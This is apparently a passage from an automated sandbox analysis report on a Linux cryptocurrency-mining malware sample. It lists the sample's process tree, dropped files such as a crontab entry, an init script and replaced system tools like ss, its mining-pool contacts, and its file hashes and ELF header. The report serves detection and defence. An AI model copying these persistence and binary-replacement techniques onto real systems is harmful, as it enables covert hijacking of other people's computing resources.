                  • uniq (PID: 6175, Parent: 6173, MD5: a83f5f379d810462d528dc460d63a04b)
                • uname (PID: 6176, Parent: 5488, MD5: 81136bf3b923238a5420a003d585a68f)
                • tmpnam_KEKnmE New Fork (PID: 6266, Parent: 5488)
                  • grep (PID: 6267, Parent: 6266, MD5: 6cd81dedcf076b9ad7cfbfec976245d5)
                  • uniq (PID: 6268, Parent: 6266, MD5: a83f5f379d810462d528dc460d63a04b)
                  • wc (PID: 6269, Parent: 6266, MD5: 1304115f965d6c9062947a3b35d9e140)
                • tmpnam_KEKnmE New Fork (PID: 6270, Parent: 5488)
                  • grep (PID: 6271, Parent: 6270, MD5: 6cd81dedcf076b9ad7cfbfec976245d5)
                  • uniq (PID: 6272, Parent: 6270, MD5: a83f5f379d810462d528dc460d63a04b)
                • uname (PID: 6273, Parent: 5488, MD5: 81136bf3b923238a5420a003d585a68f)
          • tmpnam_KEKnmE New Fork (PID: 5473, Parent: 5465)
            • which (PID: 5480, Parent: 5473, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)
          • which (PID: 5489, Parent: 5465, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)
          • tmpnam_KEKnmE New Fork (PID: 5499, Parent: 5465)
            • which (PID: 5509, Parent: 5499, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)
          • which (PID: 5522, Parent: 5465, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)
          • tmpnam_KEKnmE New Fork (PID: 5530, Parent: 5465)
            • which (PID: 5541, Parent: 5530, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)
          • which (PID: 5550, Parent: 5465, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)
          • tmpnam_KEKnmE New Fork (PID: 5559, Parent: 5465)
            • chattr (PID: 5568, Parent: 5559, MD5: 429aabf876ae1d2fa2459219366d273c)
          • tmpnam_KEKnmE New Fork (PID: 5585, Parent: 5465)
            • chmod (PID: 5595, Parent: 5585, MD5: 7c556d30bb69995e4844f5e319e8c303)
          • tmpnam_KEKnmE New Fork (PID: 5607, Parent: 5465)
            • cp (PID: 5615, Parent: 5607, MD5: afc7c3ab2546d6d8a98854dcaaa731b3)
            • touch (PID: 5641, Parent: 5607, MD5: 985a951b1a7a8dbe51973e651a365900)
          • tmpnam_KEKnmE New Fork (PID: 5649, Parent: 5465)
            • which (PID: 5658, Parent: 5649, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)
          • which (PID: 5666, Parent: 5465, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)
          • tmpnam_KEKnmE New Fork (PID: 5675, Parent: 5465)
            • which (PID: 5678, Parent: 5675, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)
          • which (PID: 5688, Parent: 5465, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)
          • tmpnam_KEKnmE New Fork (PID: 5693, Parent: 5465)
            • chattr (PID: 5703, Parent: 5693, MD5: 429aabf876ae1d2fa2459219366d273c)
          • tmpnam_KEKnmE New Fork (PID: 5712, Parent: 5465)
            • which (PID: 5721, Parent: 5712, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)
          • which (PID: 5729, Parent: 5465, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)
          • tmpnam_KEKnmE New Fork (PID: 5747, Parent: 5465)
            • which (PID: 5755, Parent: 5747, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)
          • which (PID: 5763, Parent: 5465, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)
          • tmpnam_KEKnmE New Fork (PID: 5772, Parent: 5465)
            • which (PID: 5780, Parent: 5772, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)
          • which (PID: 5789, Parent: 5465, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)
          • tmpnam_KEKnmE New Fork (PID: 5797, Parent: 5465)
            • chattr (PID: 5805, Parent: 5797, MD5: 429aabf876ae1d2fa2459219366d273c)
          • tmpnam_KEKnmE New Fork (PID: 5818, Parent: 5465)
            • chmod (PID: 5827, Parent: 5818, MD5: 7c556d30bb69995e4844f5e319e8c303)
          • tmpnam_KEKnmE New Fork (PID: 5837, Parent: 5465)
            • cp (PID: 5845, Parent: 5837, MD5: afc7c3ab2546d6d8a98854dcaaa731b3)
            • touch (PID: 5854, Parent: 5837, MD5: 985a951b1a7a8dbe51973e651a365900)
          • tmpnam_KEKnmE New Fork (PID: 5862, Parent: 5465)
            • which (PID: 5870, Parent: 5862, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)
          • which (PID: 5877, Parent: 5465, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)
          • tmpnam_KEKnmE New Fork (PID: 5884, Parent: 5465)
            • which (PID: 5891, Parent: 5884, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)
          • which (PID: 5898, Parent: 5465, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)
          • tmpnam_KEKnmE New Fork (PID: 5909, Parent: 5465)
            • chattr (PID: 5918, Parent: 5909, MD5: 429aabf876ae1d2fa2459219366d273c)
        • sh New Fork (PID: 5925, Parent: 5461)
        • rm (PID: 5925, Parent: 5461, MD5: a53cece4b9a67959e2143873e47a9cc5)
    • sh (PID: 5455, Parent: 5451, MD5: df0d31d6acbb7862916223a26cc45da0)
      • sh New Fork (PID: 5458, Parent: 5455)
      • cp (PID: 5458, Parent: 5455, MD5: afc7c3ab2546d6d8a98854dcaaa731b3)
      • sh New Fork (PID: 5471, Parent: 5455)
      • ln (PID: 5471, Parent: 5455, MD5: 1b38975800862fdf2d2c8165ed30690b)
      • sh New Fork (PID: 5481, Parent: 5455)
      • ln (PID: 5481, Parent: 5455, MD5: 1b38975800862fdf2d2c8165ed30690b)
      • sh New Fork (PID: 5490, Parent: 5455)
      • ln (PID: 5490, Parent: 5455, MD5: 1b38975800862fdf2d2c8165ed30690b)
      • sh New Fork (PID: 5498, Parent: 5455)
      • ln (PID: 5498, Parent: 5455, MD5: 1b38975800862fdf2d2c8165ed30690b)
      • sh New Fork (PID: 5507, Parent: 5455)
      • ln (PID: 5507, Parent: 5455, MD5: 1b38975800862fdf2d2c8165ed30690b)
      • sh New Fork (PID: 5520, Parent: 5455)
      • ln (PID: 5520, Parent: 5455, MD5: 1b38975800862fdf2d2c8165ed30690b)
      • sh New Fork (PID: 5529, Parent: 5455)
      • ln (PID: 5529, Parent: 5455, MD5: 1b38975800862fdf2d2c8165ed30690b)
      • sh New Fork (PID: 5538, Parent: 5455)
      • ln (PID: 5538, Parent: 5455, MD5: 1b38975800862fdf2d2c8165ed30690b)
      • sh New Fork (PID: 5546, Parent: 5455)
      • ln (PID: 5546, Parent: 5455, MD5: 1b38975800862fdf2d2c8165ed30690b)
      • sh New Fork (PID: 5556, Parent: 5455)
      • ln (PID: 5556, Parent: 5455, MD5: 1b38975800862fdf2d2c8165ed30690b)
      • sh New Fork (PID: 5565, Parent: 5455)
      • ln (PID: 5565, Parent: 5455, MD5: 1b38975800862fdf2d2c8165ed30690b)
      • sh New Fork (PID: 5573, Parent: 5455)
      • ln (PID: 5573, Parent: 5455, MD5: 1b38975800862fdf2d2c8165ed30690b)
      • sh New Fork (PID: 5581, Parent: 5455)
      • ln (PID: 5581, Parent: 5455, MD5: 1b38975800862fdf2d2c8165ed30690b)
      • sh New Fork (PID: 5590, Parent: 5455)
      • ln (PID: 5590, Parent: 5455, MD5: 1b38975800862fdf2d2c8165ed30690b)
      • sh New Fork (PID: 5599, Parent: 5455)
      • ln (PID: 5599, Parent: 5455, MD5: 1b38975800862fdf2d2c8165ed30690b)
      • sh New Fork (PID: 5609, Parent: 5455)
      • touch (PID: 5609, Parent: 5455, MD5: 985a951b1a7a8dbe51973e651a365900)
    • sh (PID: 5618, Parent: 5451, MD5: df0d31d6acbb7862916223a26cc45da0)
    • cat (PID: 5618, Parent: 5451, MD5: 1484a27859e2ca20ad667cc06d595d22)
    • sh (PID: 5632, Parent: 5451, MD5: df0d31d6acbb7862916223a26cc45da0)
    • sh (PID: 5640, Parent: 5451, MD5: df0d31d6acbb7862916223a26cc45da0)
      • sh New Fork (PID: 5651, Parent: 5640)
      • sysctl (PID: 5651, Parent: 5640, MD5: 9df6c33985f7fcbf67238428900a5a8d)
    • sh (PID: 5667, Parent: 5451, MD5: df0d31d6acbb7862916223a26cc45da0)
      • sh New Fork (PID: 5676, Parent: 5667)
      • sysctl (PID: 5676, Parent: 5667, MD5: 9df6c33985f7fcbf67238428900a5a8d)
    • sh (PID: 5694, Parent: 5451, MD5: df0d31d6acbb7862916223a26cc45da0)
      • sh New Fork (PID: 5702, Parent: 5694)
        • sh New Fork (PID: 5711, Parent: 5702)
        • touch (PID: 5711, Parent: 5702, MD5: 985a951b1a7a8dbe51973e651a365900)
        • sh New Fork (PID: 5724, Parent: 5702)
        • chmod (PID: 5724, Parent: 5702, MD5: 7c556d30bb69995e4844f5e319e8c303)
    • coinminer New Fork (PID: 5731, Parent: 5451)
      • sh (PID: 6121, Parent: 5731, MD5: df0d31d6acbb7862916223a26cc45da0)
        • sh New Fork (PID: 6122, Parent: 6121)
        • ps (PID: 6122, Parent: 6121, MD5: 8f71c85b9cc1809af7e7612c6144c527)
        • sh New Fork (PID: 6123, Parent: 6121)
        • grep (PID: 6123, Parent: 6121, MD5: 6cd81dedcf076b9ad7cfbfec976245d5)
        • sh New Fork (PID: 6124, Parent: 6121)
        • awk (PID: 6124, Parent: 6121, MD5: 36e491b1e47944fb397b84f790ef5093)
        • sh New Fork (PID: 6125, Parent: 6121)
        • xargs (PID: 6125, Parent: 6121, MD5: 2098c131c6f1f63777e9678b4be4e752)
          • xargs New Fork (PID: 6129, Parent: 6125)
          • kill (PID: 6129, Parent: 6125, MD5: 39b42e1d9f0e1f508f3d256386551133)
      • sh (PID: 6218, Parent: 5731, MD5: df0d31d6acbb7862916223a26cc45da0)
        • sh New Fork (PID: 6219, Parent: 6218)
        • ps (PID: 6219, Parent: 6218, MD5: 8f71c85b9cc1809af7e7612c6144c527)
        • sh New Fork (PID: 6220, Parent: 6218)
        • grep (PID: 6220, Parent: 6218, MD5: 6cd81dedcf076b9ad7cfbfec976245d5)
        • sh New Fork (PID: 6221, Parent: 6218)
        • awk (PID: 6221, Parent: 6218, MD5: 36e491b1e47944fb397b84f790ef5093)
        • sh New Fork (PID: 6222, Parent: 6218)
        • xargs (PID: 6222, Parent: 6218, MD5: 2098c131c6f1f63777e9678b4be4e752)
          • xargs New Fork (PID: 6224, Parent: 6222)
          • kill (PID: 6224, Parent: 6222, MD5: 39b42e1d9f0e1f508f3d256386551133)
  • cleanup

Created / dropped Files

/etc/crontab
Process:/bin/sh
File Type:ASCII text
Size (bytes):29
Entropy (8bit):3.7454064259382482
Encrypted:false
MD5:5FD705938F9AC092F364F71EA2BD0E6F
SHA1:F509AA606288B3971D2EB26A34CA1B5E367BDA83
SHA-256:EC76426A62B45CC455F05FBCCE1C35DCDD4A6C51B07F912BDF975483C5C5592D
SHA-512:12BF7782F11E8FB9F22558D5B0E406F1671DF5C61316CBABFAB24038450224D73F0037907A75265008EADF0EB159FB86A3A37497CACB41058A7B8A67FB16DF86
Malicious:true
Reputation:low
/etc/rc.d/init.d/acpidtd
Process:/bin/cp
File Type:ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, stripped
Size (bytes):1223753
Entropy (8bit):7.078975512411001
Encrypted:false
MD5:EAFEF5B086D1E5940AB27A617E48B7C4
SHA1:2E3549A3E2BD2E432AAA284AE66ED7F4A8011C27
SHA-256:723607BE9893F40FE241A1401342A8E12A56EB2B70E31E63E2047DC081E17E44
SHA-512:158FB6CBD0CCA82B3FF16CD5AD7F02CF8B274AE2A4F167D7A99C5A81F3D1A774DD7EDC1D61F509DB2E4676C672D91CE955DAD2F4F19817D7762B7F1CDE054905
Malicious:true
Reputation:low
/etc/resolv.conf
Process:/tmp/coinminer
File Type:ASCII text
Size (bytes):53
Entropy (8bit):3.752995276014951
Encrypted:false
MD5:3615D12B4DE9B6DFB843FAA13BA27EE3
SHA1:097CB5451232E8249E7EB5425A9F1389290ECF0D
SHA-256:63B88F240DBC259B3F4CEF56B8B65E5826284D9239660CB2858A7426831B4779
SHA-512:8589AE151FC60CAD1FB187611BC81BF7A903B6647A491C0BFD5A54C394162231165D145C4D4833563FC3440ED7D95F57D9A230057ADCE4EF8BF0F7917A422026
Malicious:false
Reputation:low
/proc/sys/vm/nr_hugepages
Process:/sbin/sysctl
File Type:ASCII text
Size (bytes):4
Entropy (8bit):2.0
Encrypted:false
MD5:650A1C9C9BAA20730B4FCFDBE4CDC135
SHA1:3E3B509DB98E4D590F900354BA6D0D7FCA39FF2D
SHA-256:56292515F7D3A7110811EB8DE26B3F75F82A0766AA5A1FD66EBCFCB84FE6D5FF
SHA-512:45DA0A164742A0A7294B68A1A0FB1868B4DEA8E1D2B5519FAADBC768CDA1AF44246EAF3032B7629D4EB106D5524611637BA49202F6790438CD351CAED489A21E
Malicious:false
Reputation:low
/tmp/tmplog
Process:/tmp/coinminer
File Type:ASCII text
Size (bytes):136
Entropy (8bit):4.646588511354186
Encrypted:false
MD5:A1ED9B1A92D85563B426DC5C369C81DF
SHA1:B2339DFA93BC2991E1DE7245D68A10AE8CBB6507
SHA-256:DB90E116874B411C2DE00E2B703EFD02E7CFDAF309745551B440CAEEBCDD2083
SHA-512:1839FFF5953AD74155AA9C4214279EFF8B8B6AB31D33E41A0EED6AF9BCB568AAE14DA77E11F9A95E76A22314DAA58471A1BB0345CF8E926DE6B69C4DBB28CA82
Malicious:false
Reputation:low
/tmp/tmpnam_KEKnmE
Process:/tmp/coinminer
File Type:ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, stripped
Size (bytes):1223753
Entropy (8bit):7.078975512411001
Encrypted:false
MD5:EAFEF5B086D1E5940AB27A617E48B7C4
SHA1:2E3549A3E2BD2E432AAA284AE66ED7F4A8011C27
SHA-256:723607BE9893F40FE241A1401342A8E12A56EB2B70E31E63E2047DC081E17E44
SHA-512:158FB6CBD0CCA82B3FF16CD5AD7F02CF8B274AE2A4F167D7A99C5A81F3D1A774DD7EDC1D61F509DB2E4676C672D91CE955DAD2F4F19817D7762B7F1CDE054905
Malicious:true
Reputation:low
/usr/bin/ddus-uidgen
Process:/bin/cp
File Type:ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, stripped
Size (bytes):1223753
Entropy (8bit):7.078975512411001
Encrypted:false
MD5:EAFEF5B086D1E5940AB27A617E48B7C4
SHA1:2E3549A3E2BD2E432AAA284AE66ED7F4A8011C27
SHA-256:723607BE9893F40FE241A1401342A8E12A56EB2B70E31E63E2047DC081E17E44
SHA-512:158FB6CBD0CCA82B3FF16CD5AD7F02CF8B274AE2A4F167D7A99C5A81F3D1A774DD7EDC1D61F509DB2E4676C672D91CE955DAD2F4F19817D7762B7F1CDE054905
Malicious:false
Reputation:low
/usr/bin/scnetstat
Process:/tmp/tmpnam_KEKnmE
File Type:data
Size (bytes):123675
Entropy (8bit):5.876757520501345
Encrypted:false
MD5:D03327A4CE834705219DFD33F391486B
SHA1:E5635CB6D40541B6E67C7D11EC3D19F67BDC3CD0
SHA-256:427EE62CC86673A3ABB1406CA80B1BE41EECDF795B0C2206793923AE68C9A3A6
SHA-512:938A5A24C6451939D5272523518FFEE8C510B49A7EC4573450D1B02C088335363DA6C3D65376F8404B8214047A4F3F39476B3370374DC45466C61E7BA5B5EE35
Malicious:false
Reputation:low
/usr/bin/wipefs
Process:/bin/cp
File Type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
Size (bytes):2384177
Entropy (8bit):7.385631032142223
Encrypted:false
MD5:9A0629BBB97EF2C2FD8369778AA9A0D3
SHA1:AC522A00B0B668FEDCABB26D9F8A3F730A34DAFB
SHA-256:D47D2AA3C640E1563BA294A140AB3CCD22F987D5C5794C223CA8557B68C25E0D
SHA-512:175B0E11A995E545E2D7B351C67DE56F8B1BA4667811BE665DB2CBA4C27D4FD643F581564F07D413FCED4F497186DE94CA3E1BC68C9CB5D39FCF498140E19ABB
Malicious:true
Antivirus:
  • Antivirus: Avira, Detection: 100%, Browse
Reputation:low
/usr/sbin/scss
Process:/tmp/tmpnam_KEKnmE
File Type:data
Size (bytes):123675
Entropy (8bit):5.934501190892608
Encrypted:false
MD5:CA5B7947D2A598F71E675EE80FC28280
SHA1:44F3D6EC178920DC26B0BDF35FD5F5F3712B3463
SHA-256:04E38230DAE3FF2444A14C01535FD31CC13488B7DD4E42386D8CA7F86E542D14
SHA-512:5960ADE39D187594184965F3DC831E22E89E70E15A64977D848F1377F1CE7702E7B0C82EFA54760DD1F890EF8979D17DE0B4AA3B94FE92C307A789F224194393
Malicious:false
Reputation:low
/usr/sbin/ss
Process:/bin/cp
File Type:ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, stripped
Size (bytes):1223753
Entropy (8bit):7.078975512411001
Encrypted:false
MD5:EAFEF5B086D1E5940AB27A617E48B7C4
SHA1:2E3549A3E2BD2E432AAA284AE66ED7F4A8011C27
SHA-256:723607BE9893F40FE241A1401342A8E12A56EB2B70E31E63E2047DC081E17E44
SHA-512:158FB6CBD0CCA82B3FF16CD5AD7F02CF8B274AE2A4F167D7A99C5A81F3D1A774DD7EDC1D61F509DB2E4676C672D91CE955DAD2F4F19817D7762B7F1CDE054905
Malicious:false
Reputation:low

Contacted Domains/Contacted IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
pool.minexmr.com37.59.43.131truefalsehigh

Contacted IPs

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Public

IPCountryFlagASNASN NameMalicious
37.59.43.131France
16276OVHFRfalse
163.17.30.212Taiwan; Republic of China (ROC)
1659ERX-TANET-ASN1TaiwanAcademicNetworkTANetInformationCtrue

Static File Info

General

File type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
Entropy (8bit):7.385631032142223
TrID:
  • ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name:coinminer
File size:2384177
MD5:9a0629bbb97ef2c2fd8369778aa9a0d3
SHA1:ac522a00b0b668fedcabb26d9f8a3f730a34dafb
SHA256:d47d2aa3c640e1563ba294a140ab3ccd22f987d5c5794c223ca8557b68c25e0d
SHA512:175b0e11a995e545e2d7b351c67de56f8b1ba4667811be665db2cba4c27d4fd643f581564f07d413fced4f497186de94ca3e1bc68c9cb5d39fcf498140e19abb
File Content Preview:.ELF..............>.......@.....@........\$.........@.8...@.......................@.......@.....<.#.....<.#....... ...............#......................y................ ...............#.............................................Q.td...................

Static ELF Info

ELF header

Class:ELF64
Data:2's complement, little endian
Version:1 (current)
Machine:Advanced Micro Devices X86-64
Version Number:0x1
Type:EXEC (Executable file)
OS/ABI:UNIX - System V
ABI Version:0
Entry Point Address:0x4015ff
Flags:0x0
ELF Header Size:64
Program Header Offset:64
Program Header Size:56
Number of Program Headers:5
Section Header Offset:2383024
Section Header Size:64